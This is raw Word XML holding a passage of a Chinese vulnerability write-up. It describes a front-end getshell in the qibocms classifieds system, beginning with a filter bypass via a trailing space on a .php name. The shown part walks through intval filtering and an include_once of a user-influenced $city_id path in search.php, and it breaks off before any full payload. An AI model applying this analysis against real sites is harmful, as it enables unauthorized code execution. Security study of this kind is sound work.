    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="1278"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这句话逻辑有点问题，应该把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-84"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">strpos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的两个参数位置替换下，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例如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我提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>a.php+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空格的话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就能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绕过了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="8344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191454</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4025848" cy="864203"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="12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6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848" cy="86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8368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1212534</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3912622" cy="2154555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="12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622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292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="13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rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1775"/>
          <w:tab w:val="left" w:pos="4862"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>qibocms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-75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类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-77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系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-77"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-77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最</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-77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新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-77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版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-78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台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-78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无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-78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限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-76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制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="255"/>
        <w:ind w:left="417" w:right="317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Getshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:t>作者：雨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="44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807" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.5pt;width:337.5pt;height:50.85pt;z-index:8392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88" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="1970"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>isset(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$page) &amp;&amp; $page = intval($page); isset($id) &amp;&amp; $id = intval($id);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首先来看一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">inc/common.inc.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中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1806" type="#_x0000_t202" style="width:337.5pt;height:116.0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247"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>isset($fup) &amp;&amp; $aid = intval($fup); isset($aid) &amp;&amp; $aid = intval($aid); isset($rid) &amp;&amp; $rid = intval($rid); isset($fid) &amp;&amp; $fid = intval($fid); isset($cid) &amp;&amp; $cid = intval($cid); isset($cityid) &amp;&amp;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $cityid = intval($cityid);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0"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="417" w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到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city_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在全局文件中被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intval </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">search.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3165"/>
          <w:tab w:val="left" w:pos="4079"/>
          <w:tab w:val="left" w:pos="5913"/>
          <w:tab w:val="left" w:pos="6827"/>
        </w:tabs>
        <w:spacing w:before="100"/>
        <w:ind w:left="417"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s1741" style="position:absolute;left:0;text-align:left;margin-left:80.45pt;margin-top:-8.2pt;width:338pt;height:181.75pt;z-index:-362536;mso-position-horizontal-relative:page" coordorigin="1609,-164" coordsize="6760,3635">
            <v:rect id="_x0000_s1805" style="position:absolute;left:1617;top:-157;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1804" style="position:absolute;left:1797;top:56;width:1928;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1803" style="position:absolute;left:3725;top:56;width:820;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1802" style="position:absolute;left:4545;top:56;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1801" style="position:absolute;left:4786;top:56;width:675;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1800" style="position:absolute;left:5461;top:56;width:964;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1799" style="position:absolute;left:6425;top:56;width:868;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1798" style="position:absolute;left:7293;top:56;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1797" style="position:absolute;left:7413;top:56;width:796;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1796" style="position:absolute" from="1612,-160" to="8366,-160" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1795" style="position:absolute" from="1614,-162" to="1614,349" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1794" style="position:absolute" from="8364,-157" to="8364,349" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1793" style="position:absolute;left:1617;top:349;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1792" style="position:absolute;left:1797;top:412;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1791" style="position:absolute;left:3966;top:412;width:579;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1790" style="position:absolute;left:4545;top:412;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1789" style="position:absolute;left:4786;top:412;width:675;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1788" style="position:absolute;left:5461;top:412;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1787" style="position:absolute;left:6666;top:412;width:627;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1786" style="position:absolute;left:7293;top:412;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1785" style="position:absolute;left:7413;top:412;width:796;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1784" style="position:absolute" from="1614,349" to="1614,675" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1783" style="position:absolute" from="8364,349" to="8364,675" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1782" style="position:absolute;left:1617;top:675;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1781" style="position:absolute;left:1797;top:738;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1780" style="position:absolute;left:3725;top:738;width:820;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1779" style="position:absolute;left:4545;top:738;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1778" style="position:absolute;left:4786;top:738;width:675;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1777" style="position:absolute;left:5461;top:738;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1776" style="position:absolute;left:6425;top:738;width:868;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1775" style="position:absolute;left:7293;top:738;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1774" style="position:absolute;left:7413;top:738;width:796;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1773" style="position:absolute" from="1614,675" to="1614,1001" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1772" style="position:absolute" from="8364,675" to="8364,1001" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1771" style="position:absolute;left:1617;top:1001;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1770" style="position:absolute;left:1797;top:1064;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1769" style="position:absolute" from="1614,1001" to="1614,1327" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1768" style="position:absolute" from="8364,1001" to="8364,1327" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1767" style="position:absolute;left:1617;top:1327;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1766" style="position:absolute;left:1797;top:1360;width:400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1765" style="position:absolute" from="1614,1327" to="1614,1653" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1764" style="position:absolute" from="8364,1327" to="8364,1653" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1763" style="position:absolute;left:1617;top:1653;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1762" style="position:absolute" from="1614,1653" to="1614,1979" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1761" style="position:absolute" from="8364,1653" to="8364,1979" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1760" style="position:absolute;left:1617;top:1979;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1759" style="position:absolute;left:1797;top:2042;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1758" style="position:absolute" from="1614,1979" to="1614,2305" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1757" style="position:absolute" from="8364,1979" to="8364,2305" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1756" style="position:absolute;left:1617;top:2305;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1755" style="position:absolute;left:1797;top:2368;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1754" style="position:absolute;left:2158;top:2368;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1753" style="position:absolute;left:2258;top:2368;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1752" style="position:absolute" from="1614,2305" to="1614,2631" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1751" style="position:absolute" from="8364,2305" to="8364,2631" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1750" style="position:absolute;left:1617;top:2631;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1749" style="position:absolute;left:1797;top:2694;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1748" style="position:absolute" from="1614,2631" to="1614,2957" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1747" style="position:absolute" from="8364,2631" to="8364,2957" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1746" style="position:absolute;left:1617;top:2957;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1745" style="position:absolute;left:1797;top:3020;width:5422;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1744" style="position:absolute" from="1612,3465" to="8366,3465" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1743" style="position:absolute" from="1614,2957" to="1614,3468" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1742" style="position:absolute" from="8364,2957" to="8364,3468" strokecolor="#ccc" strokeweight=".24pt"/>
            <w10:wrap anchorx="page"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>postdb[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>city_id]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
        <w:t>$city_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>$postdb[city_id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3165"/>
          <w:tab w:val="left" w:pos="4079"/>
          <w:tab w:val="left" w:pos="5913"/>
          <w:tab w:val="left" w:pos="6827"/>
        </w:tabs>
        <w:spacing w:before="112"/>
        <w:ind w:left="417"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>postdb[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>street_id]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
        <w:t>$street_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>$postdb[street_</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3165"/>
          <w:tab w:val="left" w:pos="4079"/>
          <w:tab w:val="left" w:pos="5913"/>
          <w:tab w:val="left" w:pos="6827"/>
        </w:tabs>
        <w:spacing w:before="126"/>
        <w:ind w:left="417"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>postdb[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>zone_id]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
        <w:t>$zone_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>$postdb[zone_id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126"/>
        <w:ind w:left="417" w:right="1839"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>@include_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>once(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ROOT_PATH."data/zone/$city_id.php");//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="62"/>
        <w:ind w:left="417" w:right="2322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包含</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="99" w:line="391" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="1888"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>$city_fid=select_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>where(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve">"{$_pre}city","'postdb[city_i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">d]' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>onChange=\"choose_where('getzone'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve">,this.options[this. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>selectedIndex].value,'','1','')\"",$city_id);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="417" w:right="2322"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局有</w:t>
      </w:r>
